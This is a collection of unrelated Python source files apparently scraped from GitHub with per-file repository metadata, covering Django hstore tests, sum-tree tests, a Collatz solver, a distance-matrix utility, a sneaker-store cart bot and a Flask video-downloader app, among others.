def test_multiple_key_subset_querying(self):
alpha, beta = self._create_bags()
for keys in (['v'], ['v', 'v2']):
qs = DataBag.objects.where(
HstoreExpression("data").contains(keys)
)
self.assertEqual(qs.count(), 2)
for keys in (['v', 'nv'], ['n1', 'n2']):
qs = DataBag.objects.where(
HstoreExpression("data").contains(keys)
)
self.assertEqual(qs.count(), 0)
def test_single_key_querying(self):
alpha, beta = self._create_bags()
for key in ('v', 'v2'):
qs = DataBag.objects.where(HstoreExpression("data").contains(key))
self.assertEqual(qs.count(), 2)
for key in ('n1', 'n2'):
qs = DataBag.objects.where(HstoreExpression("data").contains(key))
self.assertEqual(qs.count(), 0)
def test_nested_filtering(self):
self._create_bitfield_bags()
# Test cumulative successive filters for both dictionaries and other fields
qs = DataBag.objects.all()
self.assertEqual(10, qs.count())
qs = qs.where(HstoreExpression("data").contains({'b0':'1'}))
self.assertEqual(5, qs.count())
qs = qs.where(HstoreExpression("data").contains({'b1':'1'}))
self.assertEqual(2, qs.count())
qs = qs.filter(name='bag3')
self.assertEqual(1, qs.count())
def test_aggregates(self):
self._create_bitfield_bags()
res = DataBag.objects.where(HstoreExpression("data").contains({'b0':'1'}))\
.aggregate(Count('id'))
self.assertEqual(res['id__count'], 5)
def test_empty_querying(self):
bag = DataBag.objects.create(name='bag')
self.assertTrue(DataBag.objects.get(data={}))
self.assertTrue(DataBag.objects.filter(data={}))
self.assertTrue(DataBag.objects.where(HstoreExpression("data").contains({})))
class TestReferencesField(TestCase):
def setUp(self):
Ref.objects.all().delete()
RefsBag.objects.all().delete()
def _create_bags(self):
refs = [Ref.objects.create(name=str(i)) for i in range(4)]
alpha = RefsBag.objects.create(name='alpha', refs={'0': refs[0], '1': refs[1]})
beta = RefsBag.objects.create(name='beta', refs={'0': refs[2], '1': refs[3]})
return alpha, beta, refs
def test_empty_instantiation(self):
bag = RefsBag.objects.create(name='bag')
self.assertTrue(isinstance(bag.refs, dict))
self.assertEqual(bag.refs, {})
def test_equivalence_querying(self):
alpha, beta, refs = self._create_bags()
for bag in (alpha, beta):
refs = {'0': bag.refs['0'], '1': bag.refs['1']}
self.assertEqual(RefsBag.objects.get(refs=refs), bag)
r = RefsBag.objects.filter(refs=refs)
self.assertEqual(len(r), 1)
self.assertEqual(r[0], bag)
def test_hkeys(self):
alpha, beta, refs = self._create_bags()
self.assertEqual(RefsBag.objects.filter(id=alpha.id).hkeys(attr='refs'), ['0', '1'])
def test_hpeek(self):
alpha, beta, refs = self._create_bags()
self.assertEqual(RefsBag.objects.filter(id=alpha.id).hpeek(attr='refs', key='0'), refs[0])
self.assertEqual(RefsBag.objects.filter(id=alpha.id).hpeek(attr='refs', key='invalid'), None)
def test_hslice(self):
alpha, beta, refs = self._create_bags()
self.assertEqual(RefsBag.objects.filter(id=alpha.id).hslice(attr='refs', keys=['0']), {'0': refs[0]})
self.assertEqual(RefsBag.objects.filter(id=alpha.id).hslice(attr='refs', keys=['invalid']), {})
def test_empty_querying(self):
bag = RefsBag.objects.create(name='bag')
self.assertTrue(RefsBag.objects.get(refs={}))
self.assertTrue(RefsBag.objects.filter(refs={}))
# TODO: fix this test
#def test_key_value_subset_querying(self):
# alpha, beta, refs = self._create_bags()
# for bag in (alpha, beta):
# qs = RefsBag.objects.where(
# HstoreExpression("refs").contains({'0': bag.refs['0']})
# )
# self.assertEqual(len(qs), 1)
# self.assertEqual(qs[0], bag)
# qs = RefsBag.objects.where(
# HstoreExpression("refs").contains({'0': bag.refs['0'], '1': bag.refs['1']})
# )
# self.assertEqual(len(qs), 1)
# self.assertEqual(qs[0], bag)
def test_multiple_key_subset_querying(self):
alpha, beta, refs = self._create_bags()
for keys in (['0'], ['0', '1']):
qs = RefsBag.objects.where(HstoreExpression("refs").contains(keys))
self.assertEqual(qs.count(), 2)
for keys in (['0', 'nv'], ['n1', 'n2']):
qs = RefsBag.objects.where(HstoreExpression("refs").contains(keys))
self.assertEqual(qs.count(), 0)
def test_single_key_querying(self):
alpha, beta, refs = self._create_bags()
for key in ('0', '1'):
qs = RefsBag.objects.where(HstoreExpression("refs").contains(key))
self.assertEqual(qs.count(), 2)
for key in ('n1', 'n2'):
qs = RefsBag.objects.where(HstoreExpression("refs").contains(key))
self.assertEqual(qs.count(), 0)
| cr8ivecodesmith/django-orm-extensions-save22 | tests/modeltests/pg_hstore/tests.py | tests.py | py | 12,065 | python | en | code | 0 | github-code | 36 |
22193923889 | try:
# heritage des propri�t�s du CoupledModel par domainStructure
import Core.DEVSKernel.DEVS as DEVS
except:
import sys, os
for spath in [os.pardir + os.sep + 'Lib']:
if not spath in sys.path: sys.path.append(spath)
import Core.DEVSKernel.DEVS as DEVS
#======================================================================#
class DomainStructure(DEVS.CoupledDEVS):
""" Abstract DomainStructure class.
"""
###
def __init__(self):
"""Constructor.
"""
DEVS.CoupledDEVS.__init__(self)
self.dynamicComponentSet = []
self.dynamicIC = []
self.dynamicEIC = []
self.dynamicEOC = [] | akamax/devsimpy | version_3.0/Core/DomainInterface/DomainStructure.py | DomainStructure.py | py | 609 | python | en | code | 0 | github-code | 36 |
22215949702 | import pytest
from hamcrest import assert_that, equal_to
from gairl.memory.prioritized_replay_buffer import _SumTree
def test_init_valid():
# When
tree = _SumTree(8)
# Then
assert_that(tree.total_priority, equal_to(0))
assert_that(tree.priorities_range, equal_to((1, 1)))
assert_that(tree._data, equal_to([0]*8))
assert_that(tree._tree, equal_to([0]*15))
def test_init_capacity_not_power_2():
# When / Then
with pytest.raises(AssertionError):
_SumTree(10)
def test_add_not_full():
# Given
tree = _SumTree(16)
# When
tree.add((1, 'a', 1.), 1)
tree.add(('b', 2, 2.), 0.1)
tree.add(195, 3)
tree.add((3, 3., 'c'), 1)
tree.add('d', 5)
tree.add(19287412.214121, 0.1)
tree.add(0, 9)
# Then
assert_that(tree.priorities_range, equal_to((0.1, 9)))
assert_that(tree._max_priorities_num, equal_to(1))
assert_that(tree._min_priorities_num, equal_to(2))
assert_that(tree._data, equal_to([
(1, 'a', 1.), ('b', 2, 2.), 195,
(3, 3., 'c'), 'd', 19287412.214121, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0
]))
assert_that(tree._tree, equal_to([
19.2,
19.2, 0,
5.1, 14.1, 0, 0,
1.1, 4, 5.1, 9, 0, 0, 0, 0,
1, 0.1, 3, 1, 5, 0.1, 9, 0, 0, 0, 0, 0, 0, 0, 0, 0
]))
def test_add_overflow():
# Given
tree = _SumTree(4)
# When
tree.add((1, 'a', 1.), 1)
tree.add(('b', 2, 2.), 0.1)
tree.add(195, 3)
tree.add((3, 3., 'c'), 1)
tree.add('d', 5)
tree.add(19287412.214121, 0.1)
tree.add(0, 9)
# Then
assert_that(tree.priorities_range, equal_to((0.1, 9)))
assert_that(tree._max_priorities_num, equal_to(1))
assert_that(tree._min_priorities_num, equal_to(1))
assert_that(tree._data, equal_to(['d', 19287412.214121, 0, (3, 3., 'c')]))
assert_that(tree._tree, equal_to([15.1, 5.1, 10, 5, 0.1, 9, 1]))
def test_get_not_full():
# Given
tree = _SumTree(16)
tree._data = [
(1, 'a', 1.), ('b', 2, 2.), 195,
(3, 3., 'c'), 'd', 19287412.214121, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0
]
tree._tree = [
22,
22, 0,
7, 15, 0, 0,
4, 3, 6, 9, 0, 0, 0, 0,
1, 3, 1, 2, 1, 5, 9, 0, 0, 0, 0, 0, 0, 0, 0, 0
]
# When
data1 = tree.get_data(9.3)
data2 = tree.get_data(10.7)
data3 = tree.get_data(5.1)
data4 = tree.get_data(0)
data5 = tree.get_data(22)
data6 = tree.get_data(13.001)
data7 = tree.get_data(1.9)
# Then
assert_that(data1, equal_to((19287412.214121, 5, 5)))
assert_that(data2, equal_to((19287412.214121, 5, 5)))
assert_that(data3, equal_to(((3, 3., 'c'), 3, 2)))
assert_that(data4, equal_to(((1, 'a', 1.), 0, 1)))
assert_that(data5, equal_to((0, 6, 9)))
assert_that(data6, equal_to((0, 6, 9)))
assert_that(data7, equal_to((('b', 2, 2.), 1, 3)))
def test_get_overflow():
# Given
tree = _SumTree(4)
tree._data = ['d', 19287412.214121, 0, (3, 3., 'c')]
tree._tree = [
15,
5, 10,
4, 1, 7, 3
]
# When
data1 = tree.get_data(0.31)
data2 = tree.get_data(4.7)
data3 = tree.get_data(11.9999)
data4 = tree.get_data(12.1)
data5 = tree.get_data(15)
# Then
assert_that(data1, equal_to(('d', 0, 4)))
assert_that(data2, equal_to((19287412.214121, 1, 1)))
assert_that(data3, equal_to((0, 2, 7)))
assert_that(data4, equal_to(((3, 3., 'c'), 3, 3)))
assert_that(data5, equal_to(((3, 3., 'c'), 3, 3)))
def test_get_higher_than_total():
# Given
tree = _SumTree(4)
tree._data = ['d', 19287412.214121, 0, (3, 3., 'c')]
tree._tree = [
15,
5, 10,
4, 1, 7, 3
]
# When
with pytest.raises(AssertionError):
tree.get_data(15.001)
def test_update_priority_no_maxmin_change():
# Given
tree = _SumTree(8)
tree._data = ['d', 19287412.214121, 0, (3, 3., 'c')]
tree._tree = [
16,
6, 10,
4, 2, 7, 3,
1, 3, 1, 1, 4, 3, 1, 2
]
tree._min_priority = 1
tree._min_priorities_num = 4
tree._max_priority = 4
tree._max_priorities_num = 1
# When
tree.update_priority(0, 2)
tree.update_priority(2, 2)
tree.update_priority(5, 2)
tree.update_priority(6, 2)
# Then
assert_that(tree.priorities_range, equal_to((1, 4)))
assert_that(tree._max_priorities_num, equal_to(1))
assert_that(tree._min_priorities_num, equal_to(1))
assert_that(tree._data, equal_to(['d', 19287412.214121, 0, (3, 3., 'c')]))
assert_that(tree._tree, equal_to([
18,
8, 10,
5, 3, 6, 4,
2, 3, 2, 1, 4, 2, 2, 2
]))
def test_update_priority_maxmin_run_out():
# Given
tree = _SumTree(8)
tree._data = ['d', 19287412.214121, 0, (3, 3., 'c')]
tree._tree = [
18,
8, 10,
5, 3, 7, 3,
2, 3, 1, 2, 4, 3, 1, 2
]
tree._min_priority = 1
tree._min_priorities_num = 2
tree._max_priority = 4
tree._max_priorities_num = 1
# When
tree.update_priority(4, 3)
tree.update_priority(2, 2)
tree.update_priority(6, 3)
tree.update_priority(1, 3)
tree.update_priority(3, 2)
tree.update_priority(5, 2)
# Then
assert_that(tree.priorities_range, equal_to((2, 3)))
assert_that(tree._max_priorities_num, equal_to(3))
assert_that(tree._min_priorities_num, equal_to(5))
assert_that(tree._data, equal_to(['d', 19287412.214121, 0, (3, 3., 'c')]))
assert_that(tree._tree, equal_to([
19,
9, 10,
5, 4, 5, 5,
2, 3, 2, 2, 3, 2, 3, 2
]))
def test_update_priority_maxmin_overwrite():
tree = _SumTree(8)
tree._data = ['d', 19287412.214121, 0, (3, 3., 'c')]
tree._tree = [
18,
8, 10,
5, 3, 7, 3,
2, 3, 1, 2, 4, 3, 1, 2
]
tree._min_priority = 1
tree._min_priorities_num = 2
tree._max_priority = 4
tree._max_priorities_num = 1
# When
tree.update_priority(1, 5)
tree.update_priority(4, 0.5)
tree.update_priority(3, 1)
tree.update_priority(7, 5)
# Then
assert_that(tree.priorities_range, equal_to((0.5, 5)))
assert_that(tree._max_priorities_num, equal_to(2))
assert_that(tree._min_priorities_num, equal_to(1))
assert_that(tree._data, equal_to(['d', 19287412.214121, 0, (3, 3., 'c')]))
assert_that(tree._tree, equal_to([
18.5,
9, 9.5,
7, 2, 3.5, 6,
2, 5, 1, 1, 0.5, 3, 1, 5
]))
| K-Kielak/gairl | tests/memory/test_sum_tree.py | test_sum_tree.py | py | 6,504 | python | en | code | 0 | github-code | 36 |
30428285512 | # The following iterative sequence is defined for the set of positive integers:
# n → n/2 (n is even)
# n → 3n + 1 (n is odd)
# Which starting number, under one million, produces the longest chain?
from time import time
start = time()
def count_chain(start_num:int):
chain = 1
while start_num != 1:
if start_num == 1:
break
if start_num == 10:
chain+=7
break
if start_num%2 == 0:
start_num/=2
else:
start_num = (3*start_num)+1
chain+=1
return chain
highest_chain = (13,10)
num = 13
while num < 1e6:
current_chain = count_chain(num)
if current_chain > highest_chain[1]:
highest_chain = (num,current_chain)
num+=1
print(f"The number with the longest chain is {highest_chain[0]} with a chain of {highest_chain[1]}. "
f"Found in {time()-start} seconds.") | Kyudeci/EulerPythonPractice | Longest_Collatz_Sequence.py | Longest_Collatz_Sequence.py | py | 897 | python | en | code | 0 | github-code | 36 |
848235818 | from . import types
class Schema:
def __init__(self, type):
print(type(self))
self.type = type
self.type_name = types.get_type_name(type)
def assert_validation(self, value):
same_type = True
try:
if not isinstance(value, self.type):
same_type = False
except:
raise TypeError(f"\"{value}\" is not a {self.type_name}")
else:
if not same_type:
raise TypeError(f"\"{value}\" is not a {self.type_name}")
def validate(self, value):
errors: list[str] = []
try:
if not isinstance(value, self.type):
errors.append(f"\"{value}\" is not a {self.type_name}")
except:
errors.append(f"\"{value}\" is not a {self.type_name}")
else:
pass
return errors
def string():
schema = Schema(types.string)
return schema
def integer():
schema = Schema(types.integer)
return schema
def float():
schema = Schema(types.float)
return schema
def boolean():
schema = Schema(types.boolean)
return schema | rizwanmustafa/rizval | rizval/rizval.py | rizval.py | py | 1,143 | python | en | code | 0 | github-code | 36 |
26336618129 | import datetime
import smtplib
import time
import requests
import api_keys
MY_LAT = 51.53118881973776
MY_LONG = -0.08949588609011068
response = requests.get(url="http://api.open-notify.org/iss-now.json")
data = response.json()
longitude = data["iss_position"]["longitude"]
latitude = data["iss_position"]["latitude"]
print(latitude, longitude)
parameters = {
"lat": MY_LAT,
"lng": MY_LONG,
"formatted": 0
}
response = requests.get(url=f"https://api.sunrise-sunset.org/json", params=parameters)
data = response.json()
sunrise = int(data["results"]["sunrise"].split("T")[1].split(":")[0])
sunset = int(data["results"]["sunset"].split("T")[1].split(":")[0])
def is_nearby():
if (MY_LAT - 5 <= float(latitude) <= MY_LAT + 5) and (MY_LONG - 5 <= float(longitude) <= MY_LONG + 5):
return True
else:
return False
def is_night():
now = datetime.datetime.now().hour
if now >= sunset or now <= sunrise:
return True
else:
return False
while True:
time.sleep(60)
if is_nearby() and is_night():
with smtplib.SMTP(host="smtp.gmail.com") as conn:
conn.starttls()
conn.login(user=api_keys.my_email, password=api_keys.password)
conn.sendmail(from_addr=api_keys.my_email, to_addrs=api_keys.my_email, msg="update \n\nis nearby")
| Zoom30/100-python | Day 33/Day 33.py | Day 33.py | py | 1,385 | python | en | code | 0 | github-code | 36 |
39553483739 | from rest_framework import viewsets
from rest_framework.response import Response
from rest_framework.exceptions import ParseError
from rest_framework.decorators import action, api_view
from core import models, serializers, utils
from rest_framework_simplejwt.tokens import RefreshToken
@api_view(['POST'])
def signup(req):
data = {}
data['email'] = req.data.get('email')
data['password'] = req.data.get('password')
serializer = serializers.UserSerializer(data = data)
if not serializer.is_valid():
raise ParseError(serializer.errors)
serializer.save()
user = models.User.objects.get(id= serializer.data['id'])
refresh = RefreshToken.for_user(user)
return Response({
'refresh': str(refresh),
'access': str(refresh.access_token),
})
| mahziyar-es/movie-review | server/api/views/auth.py | auth.py | py | 824 | python | en | code | 0 | github-code | 36 |
23618738970 | def test(path):
from glob import glob
from os.path import join
from shutil import rmtree
from tempfile import mkdtemp
from numpy import all, abs
from quantities import kbar, eV, angstrom
from pylada.crystal import Structure
from pylada.vasp import Vasp
from pylada.vasp.relax import Relax
from pylada import default_comm
structure = Structure([[0, 0.5, 0.5],[0.5, 0, 0.5], [0.5, 0.5, 0]], scale=5.43, name='has a name')\
.add_atom(0,0,0, "Si")\
.add_atom(0.25,0.25,0.25, "Si")
vasp = Vasp()
vasp.kpoints = "Automatic generation\n0\nMonkhorst\n2 2 2\n0 0 0"
vasp.prec = "accurate"
vasp.ediff = 1e-5
vasp.encut = 1
vasp.ismear = "fermi"
vasp.sigma = 0.01
vasp.relaxation = "volume"
vasp.add_specie = "Si", "{0}/pseudos/Si".format(path)
directory = mkdtemp()
try:
functional = Relax(copy=vasp)
assert abs(functional.ediff - 1e-5) < 1e-8
assert functional.prec == 'Accurate'
result = functional(structure, outdir=directory, comm=default_comm,
relaxation="volume ionic cellshape")
assert result.success
def sortme(a): return int(a.split('/')[-1])
dirs = sorted(glob(join(join(directory, '*'), '[0-9]')), key=sortme)
# for previous, current in zip(dirs, dirs[1:]):
# assert len(check_output(['diff', join(previous, 'CONTCAR'), join(current, 'POSCAR')])) == 0
# assert len(check_output(['diff', join(current, 'CONTCAR'), join(directory, 'POSCAR')])) == 0
assert result.stress.units == kbar and all(abs(result.stress) < 1e0)
assert result.forces.units == eV/angstrom and all(abs(result.forces) < 1e-1)
assert result.total_energy.units == eV and all(abs(result.total_energy + 10.668652*eV) < 1e-2)
finally:
if directory != '/tmp/test/relax': rmtree(directory)
pass
if __name__ == "__main__":
from sys import argv
test(argv[1])
| mdavezac/LaDa | vasp/tests/runrelax.py | runrelax.py | py | 1,932 | python | en | code | 5 | github-code | 36 |
1914874686 | import math
from distributed import Client
from tqdm import tqdm
import numpy as np
import pandas as pd
def calculate_distance_between_queries(data_df, queries, metric, dask_client: Client= None, n_blocks = None):
involved_instances = np.unique(queries, axis = None)
relevant_data = data_df.reset_index(drop=True).loc[involved_instances]
chunks = np.array_split(queries, n_blocks)
if dask_client is None:
results = [_calculate_pair_list(task, metric, relevant_data) for task in tqdm(chunks, desc='calculating distances')]
else:
data_df_future = dask_client.scatter(relevant_data, broadcast=True)
futures = dask_client.map(_calculate_pair_list, chunks, metric = metric, data_df = data_df_future)
results = dask_client.gather(futures)
# collect the results in a distance matrix
n_series = relevant_data.shape[0]
dist_matrix = np.full((n_series, n_series), np.nan)
dist_matrix = pd.DataFrame(dist_matrix, index = relevant_data.index, columns = relevant_data.index)
for chunk, result in zip(chunks, results):
for (i1,i2), r in zip(chunk, result):
dist_matrix.loc[i1, i2] = r
dist_matrix.loc[i2, i1] = r
# make into df with original index
distance_df = pd.DataFrame(dist_matrix.to_numpy(), index= data_df.index[involved_instances], columns = data_df.index[involved_instances])
return distance_df
def calculate_full_distance_matrix(data_df, metric, dask_client:Client=None, n_blocks = None):
"""
calculates the distance matrix for the given data_df
"""
if n_blocks is None:
if dask_client is not None:
n_blocks = len(dask_client.scheduler_info()['workers'])*10
else:
n_blocks = 1
# Make the tasks
n_series = data_df.shape[0]
print('generating blocks')
blocks = _generate_blocks(n_series, n_blocks)
# tasks = [(data_df.iloc[row_start: row_end,:],data_df.iloc[column_start:column_end]) for
# (row_start, row_end), (column_start, column_end) in tqdm(blocks, desc='Making blocks')]
print('calculating blocks')
# execute the tasks
if dask_client is None:
results = [_calculate_block(task, metric, data_df) for task in tqdm(blocks, desc='Calculating distances')]
else:
data_df_future = dask_client.scatter(data_df, broadcast = True)
futures = dask_client.map(_calculate_block, blocks, metric = metric, data_df = data_df_future)
results = dask_client.gather(futures)
# gather the results
dist_matrix = np.zeros((n_series, n_series))
for result, block in zip(results, blocks):
dist_matrix[block[0][0]: block[0][1], block[1][0]:block[1][1]] = result
# make upper triangular matrix into full symmetrical distance matrix
dist_matrix[np.triu_indices(data_df.shape[0], k=1)] = 0
dist_matrix = dist_matrix + dist_matrix.T
# make into a nice dataframe
distance_df = pd.DataFrame(dist_matrix, index=data_df.index, columns=data_df.index)
return distance_df
def _generate_blocks(nb_series, total_blocks=500):
"""
A util function that divides the full matrix into several (equally-sized) blocks that can be calculated in parallel
The function won't generate 'total_blocks' directly but will simply try to find a number close enough
Returns a list of (start_row, end_row),(start_col, end_col)
"""
blocks_each_dimension = math.ceil(math.sqrt(total_blocks))
profiles_per_block = math.ceil(nb_series / blocks_each_dimension)
blocks = []
for row_start in range(0, nb_series, profiles_per_block):
row_end = min(row_start + profiles_per_block, nb_series)
for column_start in range(0, row_start + 1, profiles_per_block):
column_end = min(column_start + profiles_per_block, nb_series)
blocks.append(((row_start, row_end), (column_start, column_end)))
return blocks
def _calculate_pair_list(query_indices, metric, data_df):
result = []
for i1, i2 in query_indices:
profile1 = data_df.loc[i1]
profile2 = data_df.loc[i2]
distance = metric.distance(profile1, profile2)
result.append(distance)
return result
def _calculate_block(block_indices, metric, data_df):
"""
Calculates the distances between the first and second collection of profiles (in tuple profile_tuple)
"""
(row_start, row_end), (column_start, column_end) = block_indices
profiles1 = data_df.iloc[row_start: row_end]
profiles2 = data_df.iloc[column_start: column_end]
distance_matrix = np.zeros((profiles1.shape[0], profiles2.shape[0]))
for idx1, (index, profile1) in enumerate(profiles1.iterrows()):
for idx2, (index, profile2) in enumerate(profiles2.iterrows()):
distance = metric.distance(profile1, profile2)
distance_matrix[idx1, idx2] = distance
return distance_matrix | jankrans/Conditional-Generative-Neural-Networks | repositories/profile-clustering/energyclustering/clustering/similarity/distmatrix.py | distmatrix.py | py | 4,922 | python | en | code | 0 | github-code | 36 |
22644746365 | import requests
import time
from bs4 import BeautifulSoup as bs
import re
import webbrowser
sizes = [7, 9.5, 11]
new_arrivals_page_url = 'https://www.theclosetinc.com/collections/new-arrivals'
base_url = 'https://www.theclosetinc.com'
post_url = 'https://www.theclosetinc.com/cart/add.js'
keywords = ['yeezy', 'inertia']
def get_product_page_url():
for retries in range(15):
response = session.get(new_arrivals_page_url).text
soup = bs(response, 'lxml')
print('Trying to find keywords, attempt {}...'.format(retries+1))
href_link = soup.find(
"a", {'itemprop': 'url', 'href': re.compile("|".join(keywords))})
if href_link is None:
time.sleep(1)
else:
break
product_page_url = base_url + href_link.get('href')
print("Acquired product page url: {}".format(product_page_url))
add_to_cart(product_page_url)
def add_to_cart(product_page_url):
response = session.get(product_page_url).text
soup = bs(response, 'lxml')
for size in sizes:
option = soup.find('option', {'data-sku': re.compile('-' + str(size))})
if option:
if float(option.text) == size:
id = option.get('value')
webbrowser.open_new(base_url + '/cart/{}:1'.format(id))
else:
print("Size {} sold out...".format(size))
if __name__ == "__main__":
total_time = time.time()
session = requests.Session()
session.headers.update(
{'User-Agent': '"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0"'}
)
get_product_page_url()
print("Total time: ", time.time() - total_time)
| athithianr/deadstock-bot | bots/theclosetinc_bot.py | theclosetinc_bot.py | py | 1,681 | python | en | code | 0 | github-code | 36 |
8824516219 | # -*- coding: utf-8 -*-
import argparse
import sys
import gym
from gym import wrappers, logger
import matplotlib.pyplot as plt
import torch
import torch.nn as nn
import numpy as np
import random
from random import choices
class RandomAgent(object):
def __init__(self, action_space):
"""Initialize an Agent object.
Params
=======
size (int): size of the memory
memory (array()): memory of the agent
batch_size (int): size of the part of memory which is selected (N)
state_size (int): dimension of each state (D_in)
action_size (int): dimension of each action (D_out)
"""
self.action_space = action_space
self.size = 100000 # Memory size
self.memory = []
self.batch_size = 32
self.state_size = 4
self.action_size = 2
self.learning_rate = 1e-3
self.model = MultipleLayer(self.state_size, 100, self.action_size, 1)
self.model_duplicata = MultipleLayer(self.state_size, 100, self.action_size, 1)
self.loss_fn = torch.nn.MSELoss(reduction='sum')
self.optimizer = torch.optim.Adam(self.model.parameters(), lr=self.learning_rate)
self.learn_state = 0
self.gamma = 0.95
self.upadteModel()
# action 1 = droite action 0 = gauche
def act(self, observation, reward, done):
epsilon = 0.1
rnd = random.uniform(0, 1)
res = self.model(torch.tensor(observation).float())
maxval, idx = res.max(0)
maxval, idx2 = res.min(0)
if rnd < 1-epsilon:
indices = idx.item()
else:
indices = idx2.item()
return indices
def upadteModel(self):
self.model_duplicata.linear1 = self.model.linear1
self.model_duplicata.w = self.model.w
self.model_duplicata.linear2 = self.model.linear2
def remember(self, value):
self.memory.append(value)
if len(self.memory) > self.size:
self.memory.pop(0)
def showMemory(self):
print(self.memory)
def getMemory(self):
return self.memory
def retry(self, batch_size):
minibatch = random.sample(self.memory, self.batch_size)
for etat, action, etat_suivant, reward, done in minibatch:
qO = self.model(torch.tensor(etat).float())
qOsa = qO[action]
qO_suivant = self.model_duplicata(torch.tensor(etat_suivant).float())
rPlusMaxNext = reward + self.gamma*torch.max(qO_suivant)
if not done :
JO = pow(qOsa - rPlusMaxNext, 2)
else :
JO = pow(qOsa - reward, 2)
loss = self.loss_fn(qOsa, JO)
self.optimizer.zero_grad()
loss.backward()
self.optimizer.step()
if (self.learn_state % 10000 == 0):
print("learn_state : ", self.learn_state)
self.upadteModel()
self.learn_state +=1
class MultipleLayer(torch.nn.Module):
def __init__(self, D_in, H, D_out, nbcouche):
super(MultipleLayer, self).__init__()
self.n_couche = nbcouche
self.linear1 = torch.nn.Linear(D_in, H)
self.w = [torch.nn.Linear(H,H) for i in range(nbcouche)]
self.linear2 = torch.nn.Linear(H, D_out)
def forward(self, x):
y_pred = torch.sigmoid(self.linear1(x))
for n in range(self.n_couche-1):
y_pred = torch.sigmoid(self.w[n](y_pred))
y_pred = self.linear2(y_pred)
return y_pred
if __name__ == '__main__':
parser = argparse.ArgumentParser(description=None)
parser.add_argument('env_id', nargs='?', default='CartPole-v1', help='Select the environment to run')
args = parser.parse_args()
logger.set_level(logger.INFO)
env = gym.make(args.env_id)
outdir = '/tmp/random-agent-results'
env = wrappers.Monitor(env, directory=outdir, force=True)
env.seed(0)
agent = RandomAgent(env.action_space)
listSomme = []
episode_count = 260
reward = 1
max_reward = 500
etat_space = env.observation_space.shape[0]
action_space = env.action_space.n
for i in range(episode_count):
somme = 0
etat = env.reset()
done = False
while True:
# env.render()
action = agent.act(etat, reward, done)
etat_suivant, reward, done, _ = env.step(action)
reward = reward if not done else -10
tensorAdd = (etat, action, etat_suivant, reward, done)
agent.remember(tensorAdd)
etat = etat_suivant
somme += reward
if done:
agent.upadteModel()
break
if somme > max_reward:
break
if len(agent.memory) > agent.batch_size:
agent.retry(agent.batch_size)
listSomme.append(somme)
x = np.arange(episode_count)
y = np.array(listSomme)
plt.plot(x, y, "-ob", markersize=2, label="nom de la courbe")
plt.show()
env.close()
| ThibaudPerrin/tp2-bio-inspi | TP2_Cartpole.py | TP2_Cartpole.py | py | 5,135 | python | en | code | 0 | github-code | 36 |
3535750261 | import os
def get_mutations(gene, file):
"""
:param gene: For which gene is looked what different mutations are available in the maffiles.
:param file: Through which maffile the function will loop.
This function loops through a maffile to see which mutations of a specified gene are available. Those mutations
are written to the list mutations. Only mutations that are of a mutation type present in the list mutationlist
will be taken into account.
:return mutations: List with in it the mutations of a certain gene present in this maffile.
"""
mutations = []
mutationlist = ["Frame_Shift_Del", "Frame_Shift_Ins", "In_Frame_Del", "In_Frame_Ins", "Missense_Mutation",
"Nonsense_Mutation", "Nonstop_Mutation"]
filename = "D:/Chantal/Data/Maffiles/" + file
with open(filename) as maffile:
maffile.readline()
for line in maffile:
genename = line.split("\t")[0]
mutationtype = line.split("\t")[8]
if genename == gene and mutationtype in mutationlist:
mutation = (line.split("\t")[35])
mutations.append(mutation)
return mutations
def update_mutation_dic(mutation_dictionary, mutations):
"""
:param mutation_dictionary: Dictionary with in it all the mutations of a certain gene and a count how often this
mutation occurs.
:param mutations: List with in it the mutations of a certain gene present in this maffile.
This function updates the mutation_dictionary with the list of mutations of a certain maffile.
"""
for mutation in mutations:
if mutation in mutation_dictionary:
mutation_dictionary[mutation] += 1
else:
mutation_dictionary[mutation] = 1
def main():
if os.path.exists("D:/Chantal/Data/mutation_counts.txt"):
os.remove("D:/Chantal/Data/mutation_counts.txt")
mutation_dictionary = {}
gene = input("For which gene do you want to know the mutations? ")
maffiles = os.listdir("D:/Chantal/Data/Maffiles")
for file in maffiles:
mutations = get_mutations(gene.upper(), file)
print(mutations)
update_mutation_dic(mutation_dictionary, mutations)
print(mutation_dictionary)
sorted_dic = sorted(mutation_dictionary.items(), key=lambda x: x[1], reverse=True)
mutation_counts_file = open("D:/Chantal/Data/mutation_counts.txt", "a")
for mutation in sorted_dic:
mutation_counts_file.write(mutation[0] + ": " + str(mutation[1]) + "\n")
mutation_counts_file.close()
main()
| Chantal1501/Genetic-interactions-in-childhood-cancer | Testing the reliability/gene_mutations.py | gene_mutations.py | py | 2,573 | python | en | code | 0 | github-code | 36 |
71785754983 | #!/usr/bin/python3
import datetime
import flask
from . import client
from . import session
bp = flask.Blueprint("main", __name__)
def format_time(seconds):
return str(datetime.timedelta(seconds=seconds))
def format_size(size):
for unit in ["B","KB","MB","GB"]:
if abs(size) < 1024.0:
return "%3.1f%s" % (size, unit)
size /= 1024.0
@bp.route("/", methods=["GET", "POST"])
def index():
with client.Client() as flask.g.client:
context = {
"format_time": format_time,
"format_size": format_size
}
if flask.request.method == "POST":
address = flask.request.form["address"]
context["address"] = address
context["meta"] = flask.g.client.metadata(address)
return flask.render_template("index.html", **context)
@bp.route("/status")
def status():
with client.Client() as flask.g.client, session.Session() as flask.g.session:
downloads = flask.g.client.get_downloads()
required_directories = flask.g.session.get_directories()
existing_directories = set()
for download in downloads:
if download["directory"] in required_directories:
existing_directories.add(download["directory"])
download["hidden"] = False
else:
download["hidden"] = True
flask.g.session.set_directories(existing_directories)
context = {
"downloads": downloads,
"format_size": format_size
}
return flask.render_template("status.html", **context)
@bp.route("/download", methods=["POST"])
def download():
with client.Client() as flask.g.client, session.Session() as flask.g.session:
address = flask.request.form["address"]
video_format = flask.request.form["video_format"]
audio_format = flask.request.form["audio_format"]
format = video_format + "+" + audio_format
format = format.strip("+")
if not format:
format = None
directory = flask.g.client.download(address, format)
flask.g.session.get_directories().add(directory)
return flask.redirect(flask.url_for(".index"))
@bp.route("/restart", methods=["POST"])
def restart():
with client.Client() as flask.g.client:
flask.g.client.exit()
return flask.redirect(flask.url_for(".index"))
| jakub-vanik/youtube-ripper | http/ripper/main.py | main.py | py | 2,200 | python | en | code | 0 | github-code | 36 |
74108338023 | # first order fluid-flow model based on the theory of planned behavior
from pylab import array, linspace
from scipy import integrate #for integrate.odeint
# setup logging
import logging
